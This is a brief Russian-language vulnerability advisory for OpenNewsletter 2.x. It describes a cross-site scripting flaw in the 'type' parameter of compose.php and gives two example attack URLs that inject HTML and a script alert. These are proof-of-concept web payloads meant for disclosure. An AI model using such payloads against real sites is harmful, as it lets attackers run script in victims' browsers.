Программа: OpenNewsletter 2.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре «type» сценарием compose.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://www.vulnhost.com/path/to/opennewsletter/compose.php?type=html’%3Ch1%3EXSS!%3C/h1%3E

http://www.vulnhost.com/path/to/opennewsletter/compose.php?type=’;%3CSCRIPT%3Ealert (String.fromCharCode(88,%2083,%2083,%2032,%2058,%2040))//\’;%3C/script%3E



Оставить мнение